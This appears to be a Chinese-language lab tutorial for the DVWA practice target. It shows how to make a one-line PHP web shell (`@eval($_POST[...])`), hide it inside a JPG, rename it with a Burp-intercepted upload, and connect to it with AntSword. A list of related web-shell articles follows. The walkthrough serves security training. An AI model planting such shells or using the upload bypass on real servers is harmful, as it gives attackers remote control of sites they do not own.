一、 随便找一张jpg图片

二、 新建一个txt文档

三、 在文本文档中写入一句话木马

本次实验使用的木马为password
<?php @eval($_POST['密码']);?>

四、 写入完成后将后缀名.txt改为.php

五、 合并文件

通过CMD进入储存jpg文件和php文件的目录
命令格式: cd C:\muma
使用copy命令合并文件
命令格式: copy 图片.jpg/b + 木马.php/a 合成.jpg
最后输出合并的木马文件muma.jpg

六、 打开靶场登陆DVWA

默认用户名admin
默认密码password

七、更改安全性

左侧点击DVWA Security更改安全性 改为low点击 Submit 确定

八、 准备上传

点击左侧的File Upload(文件上传)
然后将FoxyProxyBurp代理打开

FoxyProxy安装与配置

九、 开启BURP SUITE

kali直接在终端中输入burpsuite即可打开
Windows与mac端需要自行安装

十、 配置BURP

BURP内点击Proxy(代理)再点击Intercept(截断)之后等待数据包

十一、 上传

点击浏览 选择刚刚合并出来的muma.jpg文件 然后点击上传或者(Upload)

十二、BURP截包

点击上传后 浏览器开始无响应 开始BURP发现已经将数据包拦截了下来

十三、 修改数据包

将下方抓到的宝muma.jpg改为muma.php然后点击右上角的放包(Forward)一直点击 直到变成灰色无法点击为止

十四、 查看上传路径

红字提示上传文件到../../hackable/uploads/muma.php
当前URL栏中的路径为/xxx.xxx.xxx.xxx/DVWA/vulnerabilities/upload#
../的意思为返回上一级目录 两个../../代表返回前两个目录 也就代表返回到了/xxx.xxx.xxx.xxx/DVWA/目录
结合提供的路径得出 上传的完整路径为/xxx.xxx.xxx.xxx/DVWA/hackable/uploads/muma.php

十五、 验证木马

在浏览器的URL栏中输入刚刚得出的路径 查看是否能得到反馈 出现信息 代表木马存在 然后复制下当前的URL地址等待连接

十六、 连接木马

打开蚁剑 右键空白处 点击添加数据
URL地址中粘贴刚刚复制的地址
连接密码填写制作一句话木马时设置的密码
完成后点击添加
窗口自动关闭 下方显示添加数据成功
双击添加的木马 出现文件列表 代表一句话木马上传并成功
相关链接 FoxyProxy安装与配置

如有问题 还请见谅

注意:本实验仅供个人测试时使用 请勿用于非法用途

上传图片格式一句话木马相关推荐

  1. 一句话木马拿Shell与菜刀原理

    一.拿Shell的技巧 1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1 ...

  2. 如何把图片木马改成php格式,铭说 | 一句话木马的多种变形方式

    原标题:铭说 | 一句话木马的多种变形方式 今天来和大家聊一聊,一句话木马的多种变形方式. 经常有客户的网站碰到被上传小马和大马,这里的"马"是木马的意思,可不是真实的马. 通常, ...

  3. ctf php文件上传图片格式,CTF-WEB:文件上传

    文件上传 一句话木马 利用文件上传漏洞往目标网站中上传一句话木马,然后就可以在本地获取和控制整个网站目录.利用一句话木马进行入侵时需要满足木马上传成功未被查杀,知道木马的路径在哪并保证上传的木马能正常 ...

  4. 一句话木马、中国菜刀、图片一句话制作、过狗一句话

    一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用. 常用一句话木马 asp一句话木马: <%execute(request("value"))%& ...

  5. 一句话木马原理与实战

    一句话木马原理与实战 介绍 常用一句话木马 分析一句话木马 一句话使用方法 实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用. 常用一句话木马 php一句话木马: ...

  6. 记一次对DZ的渗透.(一句话木马与图片,文件上传解析漏洞)

    一.举例:St0rs Team 指剑碎星河分享 前言0X01 某日某帅正在使用着啊D 入侵百度的时候, 突然某位好友发来一条消息. "滴滴上车" 打开消息一看,说是要某帅帮忙日一个 ...

  7. mysql被木马入侵_另类网站入侵之一句话木马图片的妙用

    这篇文章有点标题党了,一句话木马大家都不陌生,我想很多菜菜都体验过他的强大之处吧.提起一句话我们不由得想起了laker大侠啊.可以说laker大侠的一句话木马真是为我们广大脚本入侵者带来不少的方便. ...

  8. php 一句话木马简介

    一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能.一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用. 一句话木马工作原理 <?php @ev ...

  9. php一句话怎么写_PHP一句话木马后门

    在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器. 一句话木马的原理很简单,造型也很简单 ...

最新文章

  1. 【C#】事件,委托3点详解
  2. Windows SharePoint Services 3.0 Step By Step翻译
  3. React + TypeScript:元素引用的传递
  4. 【电商】几种电商模式及特点
  5. 计算勒让德多项式的系数
  6. HTTP协议实体的基本讲解
  7. DevExperience(1710)
  8. 禁用导航栏的右滑返回实现全屏手势返回
  9. SequoiaDB扩容介绍与最佳实践
  10. java程序设计专业介绍_简介Java编程中的Object类
  11. TOOLFK在线工具-在线文字转语音/语音合成mp3工具
  12. 用python写了个简单的178漫画下载器
  13. Gentoo搭建PPTP服务器
  14. 淘客基地教你如何推广淘客小程序
  15. Android-video rotation详解
  16. 那些有趣/用的 Python 库
  17. 同时复制保存微商相册多个商品的图片及描述
  18. rate-limiting
  19. [siggraph13]《命运》的实时渲染技术
  20. 常用设计模式-策略模式+工厂模式+模板模式(使用场景、解决方案)

热门文章

  1. dw建站404问题,dw 404
  2. 广义相对论与量子力学的根本矛盾是什么?
  3. Nosql初探(voldemort)
  4. 程序员增加收入的实用之道
  5. 不平衡数据处理方法总结(学习笔记)
  6. mybatis使用注解的时候,找不到映射:Type interface com.dao.UserDao is not known to the MapperRegistry.
  7. 'Request(okhttp3.Request.Builder)' is not public in 'okhttp3.Request'. Cannot be accessed from outsi
  8. 计算机vb里代码里的双引号,在VB中使用字符串中的左双引号
  9. 循环神经网络RNN——利用LSTM对脑电波信号进行分类,Keras实现
  10. 张宝杰:将IT创造价值进行到底的秘诀